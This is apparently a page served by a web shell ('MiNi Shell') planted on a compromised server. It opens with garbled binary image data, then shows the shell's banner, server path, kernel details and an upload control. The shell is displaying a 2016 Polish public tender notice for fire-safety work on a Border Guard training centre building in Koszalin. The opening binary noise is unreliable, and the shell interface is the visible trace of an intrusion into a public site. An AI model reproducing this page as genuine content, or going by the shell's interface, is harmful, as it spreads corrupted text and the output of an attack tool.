JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160708/126557-N-2016.html

<p class="kh_header"><b>Koszalin: Dostosowanie budynku nr 25 w m. Koszalin do przepisów ppoż. - etap II</b><br>
<b>Numer ogłoszenia: 126557 - 2016; data zamieszczenia: 08.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Szkolenia Straży Granicznej im. Marszałka Polski Józefa Piłsudskiego , ul. Marszałka Józefa Piłsudskiego 92, 75-531 Koszalin, woj. zachodniopomorskie, tel. 94 34 44 062, 94 34 44 900, faks 94 34 44 700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cos.strazgraniczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostosowanie budynku nr 25 w m. Koszalin do przepisów ppoż. - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach przedmiotowego zamówienia ujęto wykonanie robót budowlanych na terenie COS SG w Koszalinie,  działka nr 6,  obręb nr 19 przy ul. Marszałka Józefa Piłsudskiego 92.Przedmiot zamówienia obejmuje:1. branża budowlana, 2. branża elektryczna. Zakres robót budowlanych do wykonania szczegółowo określają:projekt wykonawczy, Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych oraz szczegółowy opis przedmiotu zamówienia, stanowiący załącznik nr 1 do SIWZ.KLAUZULE SPOŁECZNE:Wymagania związane z realizacją zamówienia dotyczące zatrudnienia osób bezrobotnych (klauzula społeczna - art. 29 ust. 4 pkt 1 lit.a ustawy Pzp):1.Wykonawca przy realizacji zamówienia zatrudni w ciągu 30 dni od zawarcia umowy z Zamawiającym  1 osobę bezrobotną w rozumieniu art. 2 ust. 1 pkt 2 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (t.j.: Dz. U. z 2016 r. poz. 645, z późn. zm.) lub właściwych przepisach państwa członkowskiego Unii Europejskiej lub Europejskiego Obszaru Gospodarczego, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.2.Zatrudnienie osoby bezrobotnej winno nastąpić na podstawie umowy o pracę, powołania, wyboru, mianowania lub spółdzielczej umowy o pracę  w rozumieniu ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t.j. Dz. U. z 2014 r. poz. 1502, z późn. zm.) lub właściwych przepisów państwa członkowskiego Unii Europejskiej lub Europejskiego Obszaru Gospodarczego, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.3.Osoba bezrobotna będzie zatrudniona na czas realizacji przedmiotu zamówienia.4.Wykonawca w terminie 3 dni od daty zawarcia umowy z osobą bezrobotną oraz na każde żądanie Zamawiającego będzie zobowiązany przedstawić do wglądu Zamawiającemu umowę o pracę lub inne dokumenty świadczące o nawiązaniu stosunku pracy, a także dokumenty wydane przez właściwy organ potwierdzające status zatrudnionej osoby jako osoby bezrobotnej. 5.Wykonawca powinien uzyskać od zatrudnionej osoby bezrobotnej, zgodę na dostęp do jej danych osobowych przez Zamawiającego, w celu potwierdzenia prawidłowej realizacji zamówienia w zakresie przedmiotowej klauzuli społecznej.6.Zamawiający dopuszcza swobodę Wykonawcy w zakresie zmiany i doboru osoby podlegającej zatrudnieniu zgodnie z wymogami określonymi w pkt 1) i 2). W przypadku rozwiązania stosunku pracy z zatrudnioną osobą bezrobotną biorącą udział w realizacji zamówienia, Wykonawca w terminie 3 dni od dnia ustania stosunku pracy będzie zobowiązany powiadomić o tym fakcie Zamawiającego. Wykonawca w terminie 3 dni od powiadomienia będzie zobowiązany przedłożyć Zamawiającemu dokument, stwierdzający zatrudnienie innej osoby wskazanej w pkt 1) na warunkach określonych w pkt 2). 7.Wykonawca będzie zobowiązany prowadzić ewidencję czasu pracy zatrudnionej osoby bezrobotnej, dokumentującą świadczenie pracy w celu realizacji przedmiotu zamówienia i przedstawić ją na każde żądanie Zamawiającego.8.Wykonawca będzie zobowiązany wyrazić zgodę na wgląd przez Zamawiającego w dane osobowe zatrudnionej osoby bezrobotnej, w celu potwierdzenia prawidłowej realizacji zamówienia w zakresie przedmiotowej klauzuli społecznej.9.W przypadku niezatrudnienia przy realizacji zamówienia osoby bezrobotnej, na warunkach i w terminach określonych przez Zamawiającego, lub nie przedstawienia do wglądu Zamawiającemu na jego żądanie dokumentów świadczących o nawiązaniu stosunku pracy lub ewidencji czasu pracy zatrudnionej osoby bezrobotnej dokumentujących świadczenie pracy w celu realizacji przedmiotu zamówienia, Wykonawca zapłaci Zamawiającemu karę umowną w wysokości 2000 zł. Kara umowna będzie naliczana za każdy miesiąc, w którym Wykonawca nie wypełni zobowiązania.10.Zamawiający może odstąpić od naliczania kary, w przypadku, gdy Wykonawca wykaże, że przedstawił zgłoszenie ofert pracy powiatowemu urzędowi pracy albo odpowiedniemu organowi zajmującemu się realizacją zadań z zakresu rynku pracy w państwie, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, a niezatrudnienie osoby bezrobotnej nastąpiło z przyczyn nie leżących po jego stronie. Za przyczynę nieleżącą po stronie Wykonawcy będzie uznany w szczególności  brak osób bezrobotnych zdolnych do wykonania zamówienia na obszarze, w którym jest realizowany przedmiot umowy i w okresie jego realizacji lub odmowa podjęcia pracy przez taką osobę. Przerwa w zatrudnieniu osoby bezrobotnej nie może trwać dłużej niż 14 dni.
Wymagania związane z realizacją zamówienia dotyczące zatrudnienia osób na umowę o pracę (klauzula społeczna - art. 29 ust. 4 pkt 4 ustawy Pzp):1.Wykonawca przy realizacji zamówienia zatrudni na podstawie umowy o pracę kierownika budowy w wymiarze nie mniejszym niż ? wymiaru czasu pracy (etat częściowy). Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca w dacie zawarcia umowy z Zamawiającym zatrudnia już kierownika budowy na warunkach określonych przez Zamawiającego. Wykonawca zobowiązany będzie w tym przypadku do udokumentowania Zamawiającemu faktu nawiązania takiego stosunku pracy z kierownikiem budowy, z tym, że nawiązany stosunek pracy nie może ulec rozwiązaniu lub ustaniu przed ostatecznym wykonaniem przedmiotu zamówienia.2.Wykonawca zobowiązany jest do zatrudnienia kierownika budowy na umowę  o pracę w ciągu 2 dni od daty zawarcia umowy z Zamawiającym.3.Kierownik budowy będzie zatrudniony na czas realizacji przedmiotu zamówienia.4.Wymóg zatrudnienia przez Wykonawcę kierownika budowy na podstawie umowy o pracę wynika z zastosowania przez Zamawiającego klauzuli społecznej na podstawie art. 29 ust. 4 pkt 4 ustawy Pzp.5.Wykonawca, w terminie 3 dni od daty zawarcia umowy z kierownikiem budowy oraz na każde żądanie Zamawiającego, przedstawi do wglądu Zamawiającemu dokumenty świadczące o nawiązaniu stosunku pracy.6.Wykonawca powinien uzyskać od zatrudnionego kierownika budowy, zgodę na dostęp do jego danych osobowych przez Zamawiającego, w celu potwierdzenia prawidłowej realizacji zamówienia w zakresie przedmiotowej klauzuli społecznej.7.Zamawiający dopuszcza swobodę Wykonawcy w zakresie zmiany i doboru osoby podlegającej zatrudnieniu zgodnie z wymogami określonymi w pkt 1). W przypadku rozwiązania stosunku pracy z osobą biorącą udział przy realizacji zamówienia, Wykonawca jest zobowiązany powiadomić pisemnie Zamawiającego o tym fakcie w terminie 3 dni, licząc od dnia, w którym nastąpiło rozwiązanie lub ustanie stosunku pracy, po uprzednim przedstawieniu kandydatury innej osoby spełniającej wymagania określone w pkt 1).  8.Wykonawca w terminie 3 dni od powiadomienia, o którym mowa w pkt 7) jest zobowiązany przedłożyć Zamawiającemu dokument, stwierdzający zatrudnienie tej osoby na podstawie  umowy o pracę.9. Wykonawca będzie zobowiązany wyrazić zgodę na wgląd przez Zamawiającego w dane osobowe zatrudnionego kierownika budowy, w celu potwierdzenia prawidłowej realizacji zamówienia w zakresie przedmiotowej klauzuli społecznej.10.W przypadku niezatrudnienia przy realizacji zamówienia kierownika budowy, na warunkach i w terminach określonych przez Zamawiającego, lub nie przedstawienia do wglądu Zamawiającemu na jego żądanie dokumentów świadczących o nawiązaniu stosunku pracy, dokumentujących świadczenie pracy w celu realizacji przedmiotu zamówienia, Wykonawca zapłaci Zamawiającemu karę umowną w wysokości 2000 zł. Kara umowna będzie naliczana za każdy miesiąc, w którym Wykonawca nie wypełni zobowiązania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.10.00-4, 45.42.10.00-4, 45.45.30.00-7, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 9 000,00 zł.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.Wadium może być wniesione, zgodnie z wyborem Wykonawcy, w jednej lub w kilku formach wskazanych w art. 45 ust. 6 ustawy Pzp:</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oceny treści oświadczeń i dokumentów wymaganych w IV rozdziale SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oceny treści oświadczeń i dokumentów wymaganych w IV rozdziale SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oceny treści oświadczeń i dokumentów wymaganych w IV rozdziale SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oceny treści oświadczeń i dokumentów wymaganych w IV rozdziale SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oceny treści oświadczeń i dokumentów wymaganych w IV rozdziale SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">raport klasyfikacyjny Instytutu Techniki Budowlanej określającego rodzaj zastosowanych pap przy założeniu sklasyfikowania dachu w zakresie zachowania na oddziaływanie ognia zewnętrznego jako Broof(t1).</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Wydłużenie okresu gwarancji na roboty pokrywcze wraz z obróbkami blacharskimi, orynnowaniem,rurami spustowymi 0-60 m-cy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 Pzp Zamawiający przewiduje zmiany zawartej umowy dotyczące odpowiednio zmiany wartości zadania lub wynagrodzenia oraz zmiany terminu zakończenia robót w przypadku zaistnienia jednej z następujących okoliczności:1.w następstwie wykraczających poza terminy określone w Pzp procedur przetargowych, w tym konieczność uwzględnienia procedur odwoławczych oraz innych terminów formalno-prawnych mających wpływ na terminy realizacji zamówienia;2.w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, a zagrażającego życiu lub zdrowiu ludzi, pomimo dołożenia przez Wykonawcę wszelkich starań, aby roboty mogły być realizowane;3.zmiany zakresu przedmiotu umowy, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa;4.zmiany podwykonawcy lub dalszego podwykonawcy oraz zakresu powierzonych im do wykonania robót budowlanych;5.zmiany producenta materiałów istotnych dla wykonania przedmiotu umowy, o parametrach nie gorszych w stosunku do przewidzianych w dokumentacji, STWiORB, lub zmianie nazwy danego wyrobu przez jego producenta, zaprzestania przez producenta produkcji lub wycofania przez niego z obrotu danego wyrobu w okresie od złożenia oferty do wbudowania;6.zmiany technologii, w szczególności konieczności zrealizowania robót budowlanych przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji wykonawczej,  w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem robót. Zmiana technologii wykonania robót w stosunku do przyjętej w dokumentacji wykonawczej, z inicjatywy Wykonawcy, wymaga akceptacji Zamawiającego i projektanta;7. zmiany stawki podatku VAT w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.cos.strazgraniczna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centralny Ośrodek Szkolenia Straży Granicznej, ul. Marszałka Józefa Piłsudskiego 92, 75-531 Koszalin, budynek nr 3, pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2016 godzina 13:00, miejsce: Centralny Ośrodek Szkolenia Straży Granicznej, ul. Marszałka Józefa Piłsudskiego 92, 75-531 Koszalin, Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje zebranie Wykonawców w Centralnym Ośrodku Szkolenia Straży Granicznej im. Marszałka Polski Józefa Piłsudskiego przy ul. Marszałka Józefa Piłsudskiego 92 w Koszalinie.Osoba do kontaktu w sprawie zebrania: mjr SG Bolesław Bendasiuk, tel.: 94/ 34-44-160 lub Zbigniew Wencel, tel.: 94/ 34-44-205.Zebranie odbędzie się w dniu 15.07.2016 r. o godz.: 12:00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com